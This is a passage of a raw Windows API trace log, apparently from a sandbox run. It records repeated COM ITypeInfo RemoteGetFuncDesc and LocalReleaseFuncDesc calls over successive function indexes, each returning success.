pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.191] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.191] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x21, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.191] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.191] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x22, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.191] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.191] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x23, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.191] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.191] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x24, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.191] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.191] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x25, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.191] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.191] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x26, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.191] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.191] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x27, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.191] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.191] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x28, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.191] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.191] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x29, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.191] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.191] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2a, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.191] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.191] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2b, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.191] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.191] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2c, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.191] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.191] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2d, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.191] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.191] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2e, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.191] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.191] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2f, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.191] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.191] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x30, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.191] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.192] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x31, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.192] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.192] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x32, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.192] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.192] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x33, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.192] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.192] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x34, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.192] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.192] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x35, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.192] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.192] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x36, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.192] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.192] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x37, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.192] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.192] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x38, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.192] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.192] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x39, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.192] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.192] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3a, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.192] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.192] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3b, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.192] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.192] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3c, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.192] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.192] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3d, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.192] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.192] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3e, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.192] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.192] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3f, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.192] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.192] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x40, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.192] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.192] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x41, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.192] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.192] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x42, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.192] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.192] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x43, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.192] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.192] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x44, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.192] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.193] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x45, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.193] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.193] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x46, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.193] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.193] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x47, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.193] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.193] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x48, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.193] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.193] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x49, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.193] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.193] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4a, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.193] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.193] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4b, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.193] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.193] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4c, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.193] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.193] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4d, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.193] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.193] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4e, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.193] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.193] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4f, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.193] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.193] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x50, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.193] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.193] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x51, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.193] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.193] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x52, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.193] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.193] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x53, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.193] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.193] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x54, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.193] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.193] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x55, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.193] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.193] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x56, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.193] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.193] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x57, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.193] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.193] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x58, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.193] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.193] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x59, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.194] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.194] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5a, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.194] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.194] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5b, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.194] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.194] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5c, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.194] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.194] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5d, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.194] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.194] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5e, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.194] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.194] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5f, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.194] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.194] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x60, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.194] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.194] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x61, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.194] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.194] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x62, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.194] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.194] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x63, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.194] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.194] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x64, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.194] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.194] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x65, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.194] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.194] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x66, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.194] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.194] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x67, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.194] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.194] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x68, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.194] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.194] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x69, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.194] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.194] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6a, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.194] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.194] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6b, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.194] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.194] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6c, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.194] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.194] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6d, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.195] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.195] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6e, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.195] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.195] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6f, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.195] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.195] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x70, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.195] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.195] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x71, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.195] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.195] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x72, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.195] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.195] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x73, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.195] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.195] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x74, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.195] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.195] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x75, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.195] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.195] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x76, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.195] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.195] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x77, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.195] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.195] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x78, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.195] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.195] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x79, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.195] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.195] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7a, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.195] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.195] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7b, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.195] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.195] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7c, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.195] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.195] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7d, ppFuncDesc=0x33e4fb6378, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6378, pDummy=0x6) returned 0x0 [0060.195] ITypeInfo:LocalReleaseFuncDesc 